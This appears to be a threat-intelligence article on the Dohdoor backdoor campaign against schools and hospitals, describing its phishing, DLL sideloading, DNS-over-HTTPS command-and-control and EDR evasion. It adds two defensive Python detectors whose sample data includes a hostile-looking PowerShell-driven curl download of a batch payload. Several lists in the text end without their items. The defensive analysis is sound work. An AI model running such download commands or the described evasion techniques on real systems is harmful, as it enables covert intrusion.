Cyber threats targeting critical sectors continue to grow, and the discovery of the Dohdoor backdoor highlights how sophisticated modern attacks have become. This campaign targets organizations in the education and healthcare sectors, which manage large amounts of sensitive data and complex IT systems. By using techniques such as phishing, DLL sideloading, and encrypted command-and-control communication through DNS-over-HTTPS, attackers can quietly infiltrate networks while disguising malicious traffic as legitimate activity.
The education and healthcare sectors have long been attractive targets for cybercriminals because they manage large volumes of sensitive data and rely on complex digital infrastructures. Recently, cybersecurity researchers uncovered a sophisticated campaign involving a previously unknown malware called Dohdoor, which specifically targeted organizations within these two sectors.
Discovered by Cisco Talos, the campaign—linked to a threat actor tracked as UAT-10027—has been active since at least December 2025. The attackers deployed Dohdoor, a stealthy backdoor that uses advanced techniques such as DNS-over-HTTPS (DoH) communication, DLL sideloading, and reflective payload execution. These capabilities allow attackers to maintain covert access to compromised systems while avoiding many traditional security detection methods.
Dohdoor itself is a sophisticated backdoor designed to infiltrate Windows systems and provide remote attackers with persistent control. Unlike conventional malware that communicates through easily detectable channels, Dohdoor uses DNS-over-HTTPS (DoH) to disguise command-and-control (C2) traffic as legitimate encrypted web activity. By embedding malicious communications within normal HTTPS traffic, the malware significantly reduces the chances of being detected by network monitoring tools. Once deployed, Dohdoor can perform several malicious activities, including:
These capabilities make Dohdoor a powerful tool for cyber espionage and long-term network infiltration.
The education and healthcare sectors present attractive opportunities for cyber attackers because they manage highly sensitive data and operate complex digital environments. These factors make them frequent targets for sophisticated threats such as Dohdoor malware.
Healthcare organizations store vast amounts of confidential patient information, including medical records, insurance details, and personal identifiers. Similarly, educational institutions maintain extensive databases containing student records, academic research, and intellectual property. This sensitive data can be highly valuable for cybercriminals, whether for financial gain, identity theft, or espionage activities.
Universities, hospitals, and research institutions often rely on large and decentralized IT environments that combine legacy systems, research networks, third-party software integrations, and numerous devices used by staff and students. The complexity of these systems increases the number of potential vulnerabilities and creates multiple entry points that attackers can exploit.
Many organizations in the education and healthcare sectors operate with limited cybersecurity budgets and staffing. As a result, they may struggle to implement advanced threat detection technologies or maintain dedicated security teams capable of responding quickly to sophisticated attacks. Threat actors often exploit these limitations to deploy malware like Dohdoor with minimal resistance.
Healthcare institutions must prioritize patient care and operational continuity, while educational organizations focus on maintaining uninterrupted learning and research activities. This operational urgency can sometimes delay security updates or incident response actions, giving attackers more time to infiltrate systems and remain undetected.
Because of these combined factors, education and healthcare organizations continue to face a higher risk of targeted cyberattacks, making stronger cybersecurity awareness and defensive strategies essential.
The Dohdoor campaign uses a carefully designed multi-stage attack chain that allows attackers to gradually escalate their access within a victim’s network while remaining difficult to detect.
Although the exact entry point remains unclear, researchers believe the attackers most likely gained access through phishing-based social engineering attacks. Victims may receive emails containing malicious scripts or links that trigger the first stage of the infection. These phishing messages are crafted to look legitimate, increasing the chances that recipients will open attachments or execute embedded scripts.
Once the phishing attack succeeds, a PowerShell script is executed on the victim’s system. This script downloads a Windows batch file from a remote staging server, often using the built-in Windows utility curl.exe with encoded URLs to retrieve the malicious files. The downloaded batch files typically use extensions such as:
This stage helps attackers establish an initial foothold that prepares the system for the next phase of the attack.
The third stage involves a Windows batch script dropper that orchestrates a DLL sideloading technique. The script performs several key actions to execute the malicious payload while hiding its presence within legitimate system processes. Key activities performed by the script include:
Because the malicious DLL is executed through legitimate Windows processes, many security tools may fail to immediately detect the intrusion.
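The second and third stages described above (PowerShell driving curl.exe to fetch a file, then a DLL sideloaded from a non-system directory) expressed as detection logic over Sysmon-style telemetry. This is an added example, not code from the original article or from Talos; the trusted directories, the DLL-name subset, the sample records and every path in them are assumptions.

```python
"""Added detection example (not from the Talos report): flag two host-level
patterns described above over constructed Sysmon-style records,
event 1 = process creation and event 7 = image load."""
import ntpath
import re
from typing import Optional

# Where Windows DLLs are expected to load from (assumed policy, not exhaustive).
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\windows\\winsxs\\")
# Illustrative subset of library names commonly abused for sideloading (assumption).
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# A URL scheme, or an output flag (the URL itself may be encoded by the script).
DOWNLOAD_RE = re.compile(r"https?://|\s-o\s|\s--output\s", re.IGNORECASE)

def flag_event(ev: dict) -> Optional[str]:
    """Return a finding for one event, or None when it looks benign."""
    if ev["EventID"] == 1:
        parent = ntpath.basename(ev["ParentImage"]).lower()
        image = ntpath.basename(ev["Image"]).lower()
        # Stage 2 in the write-up: PowerShell drives curl.exe to fetch a file.
        if parent in SHELLS and image == "curl.exe" and DOWNLOAD_RE.search(ev["CommandLine"]):
            return f"powershell->curl.exe download: {ev['CommandLine']}"
    elif ev["EventID"] == 7:
        loaded = ev["ImageLoaded"].lower()
        # Stage 3: a DLL carrying a Windows library name resolved from outside
        # the system directories, i.e. next to the binary that loaded it.
        if ntpath.basename(loaded) in SYSTEM_DLL_NAMES and not loaded.startswith(TRUSTED_DLL_DIRS):
            return f"possible DLL sideload: {ev['Image']} loaded {ev['ImageLoaded']}"
    return None

def scan(events) -> list:
    """Run flag_event over a sequence of records and keep only the findings."""
    return [f for f in map(flag_event, events) if f]

# Constructed sample telemetry; paths and names are placeholders, not campaign IoCs.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -o C:\Users\Public\stage.bat http://staging.invalid/x"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\curl.exe", "CommandLine": "curl.exe --version"},
    {"EventID": 7, "Image": r"C:\Users\Public\Libs\signed_host.exe",
     "ImageLoaded": r"C:\Users\Public\Libs\version.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll"},
]
```

The image-load rule deliberately keys on the DLL name rather than the loader, because the host executable in a sideloading chain is legitimately signed and will pass reputation checks.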
To avoid detection and complicate incident investigations, the attackers incorporated several anti-forensic measures. After executing the malicious payload, the batch script performs cleanup operations such as:
These actions make it significantly more difficult for investigators to reconstruct the attack timeline.
One of the most advanced features of Dohdoor is its use of DNS-over-HTTPS (DoH) to communicate with its command-and-control (C2) infrastructure. Unlike traditional malware that relies on standard DNS queries to locate command servers, Dohdoor hides this activity within encrypted HTTPS traffic.
In a typical scenario, security tools can monitor or block suspicious DNS requests. However, Dohdoor encrypts its DNS queries and sends them to Cloudflare’s DNS service over port 443, making the traffic appear like normal encrypted web communication. Because of this, the malware can bypass many traditional DNS monitoring systems and maintain stealthy communication with its command server.
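The DoH-to-Cloudflare pattern described here, as an added detection example that is not part of the original article or of Talos's research; the log format, the allowed-process list, the threshold and the sample process name are assumptions.

```python
"""Added detection example (not from the Talos report): flag DNS-over-HTTPS use by
processes that are not expected to resolve names that way, plus request bursts that
look like C2 polling, over constructed proxy log lines (format invented here)."""
from collections import Counter
from datetime import datetime
from typing import List

# Public DoH endpoints to watch; the write-up names Cloudflare, so only its
# resolvers are listed here (assumption: extend for other providers).
DOH_HOSTS = {"cloudflare-dns.com", "mozilla.cloudflare-dns.com", "one.one.one.one",
             "1.1.1.1", "1.0.0.1"}
# Processes allowed to speak DoH under an assumed policy.
DOH_ALLOWED = {"chrome.exe", "msedge.exe", "firefox.exe"}
BEACON_THRESHOLD = 5  # DoH requests per process per minute that we treat as polling

def parse_line(line: str) -> dict:
    """Parse 'timestamp src_ip process host:port path' (constructed format)."""
    ts, src, proc, dest, path = line.split()
    host, port = dest.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")), "src": src,
            "proc": proc.lower(), "host": host.lower(), "port": int(port), "path": path}

def is_doh(rec: dict) -> bool:
    """A DoH request: HTTPS to a known resolver, or the /dns-query path anywhere."""
    return rec["port"] == 443 and (
        rec["host"] in DOH_HOSTS or rec["path"].startswith("/dns-query"))

def find_doh_abuse(lines: List[str]) -> List[str]:
    """Return one finding per unexpected DoH client and per polling burst."""
    findings, seen, per_minute = [], set(), Counter()
    for rec in map(parse_line, lines):
        if not is_doh(rec):
            continue
        key = (rec["src"], rec["proc"])
        if rec["proc"] not in DOH_ALLOWED and key not in seen:
            seen.add(key)
            findings.append(f"{rec['src']} {rec['proc']} uses DoH via {rec['host']}")
        per_minute[key + (rec["ts"].strftime("%Y-%m-%dT%H:%M"),)] += 1
    for (src, proc, minute), n in per_minute.items():
        if n >= BEACON_THRESHOLD:
            findings.append(f"{src} {proc} made {n} DoH requests during {minute}")
    return findings

# Constructed sample log; the process name is a placeholder, not a campaign IoC.
SAMPLE_LOG = [
    "2025-12-03T10:15:01Z 10.20.30.41 chrome.exe cloudflare-dns.com:443 /dns-query",
    "2025-12-03T10:15:02Z 10.20.30.41 chrome.exe www.example.com:443 /",
] + [f"2025-12-03T10:16:{s:02d}Z 10.20.30.57 updsvc.exe 1.1.1.1:443 /dns-query"
     for s in range(0, 60, 10)]
```

Host matching needs SNI or proxy visibility, so pairing this with a perimeter block on the public resolver addresses and a forced path through the managed resolver turns the same traffic into a hard failure rather than a log entry.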
Another key element of the attack is the use of Cloudflare infrastructure to hide the location of the actual command-and-control servers. By routing malicious traffic through Cloudflare’s edge network, attackers can disguise their communication and make it appear as legitimate encrypted traffic to trusted global IP addresses. This technique helps conceal the real C2 server behind a reputable cloud service and makes it more difficult for network monitoring tools to detect suspicious activity. By leveraging Cloudflare’s network, attackers ensure that:
The attackers also used cleverly disguised subdomains designed to mimic legitimate software services, such as:
To further evade detection, they used unusual top-level domains with irregular capitalization, including:
After establishing communication with the command server, Dohdoor downloads encrypted payloads that are executed directly in memory. The malware decrypts these payloads using a custom XOR-SUB encryption algorithm, then injects them into legitimate Windows processes through a technique known as process hollowing, allowing the malicious code to run while appearing as normal system activity. Some of the targeted Windows processes include:
Because the malicious code runs inside legitimate system processes, security tools may interpret the activity as normal behavior, helping the malware remain hidden.
Dohdoor also includes mechanisms designed to bypass Endpoint Detection and Response (EDR) systems. One notable technique involves unhooking system calls from ntdll.dll, a critical Windows library that security products often monitor. Security solutions typically insert hooks into system functions to observe suspicious activity. However, Dohdoor can detect these hooks and replace them with direct system call instructions, effectively bypassing the monitoring mechanism. This capability allows the malware to operate with minimal visibility and avoid triggering many endpoint security alerts.
Researchers observed that several technical characteristics of the Dohdoor campaign resemble tactics used by North Korean cyber groups. These similarities suggest a possible connection between the threat actor UAT-10027 and known North Korean advanced persistent threat operations. The similarities include:
These techniques resemble those used by the Lazarus Group, a well-known North Korean advanced persistent threat (APT) group. However, researchers currently attribute the campaign to UAT-10027 with low confidence, meaning the connection has not been fully confirmed. Interestingly, the campaign’s focus on education and healthcare sectors differs from Lazarus’s typical targets, which often include cryptocurrency platforms and defense organizations.
Analysis of the command-and-control infrastructure suggests that the attackers may have used Cobalt Strike Beacon as a follow-up payload after the initial compromise. Cobalt Strike is a commonly used post-exploitation framework that allows attackers to maintain persistent access and conduct further malicious activities within a network.
Indicators such as the observed JA3S hash and TLS certificate details closely resemble those associated with default Cobalt Strike servers. If confirmed, this would indicate that Dohdoor functions as an initial loader that prepares the environment for more advanced attack tools.
The Dohdoor campaign demonstrates how attackers continue to evolve their techniques to target critical sectors such as education and healthcare. These industries manage valuable data and operate complex digital environments, making them attractive targets for sophisticated cyber operations. Organizations in these sectors face several security challenges, including:
Advanced threats like Dohdoor highlight the urgent need for stronger cybersecurity practices, improved monitoring, and greater awareness to defend against increasingly sophisticated attacks.
Although Dohdoor malware uses advanced techniques to evade detection, organizations can significantly reduce their risk by implementing strong cybersecurity practices and improving their security monitoring capabilities.
By applying these security measures, organizations, especially those in the education and healthcare sectors, can strengthen their defenses and reduce the risk of sophisticated threats like Dohdoor malware.
The Dohdoor malware campaign targeting the education and healthcare sectors highlights the growing sophistication of modern cyber threats. By combining phishing, DLL sideloading, DNS-over-HTTPS communication, and EDR evasion techniques, attackers can infiltrate organizations while remaining hidden for long periods. This campaign underscores the need for stronger cybersecurity defenses, improved employee awareness, and proactive threat detection, especially in sectors where protecting sensitive data is critical to both operations and public trust.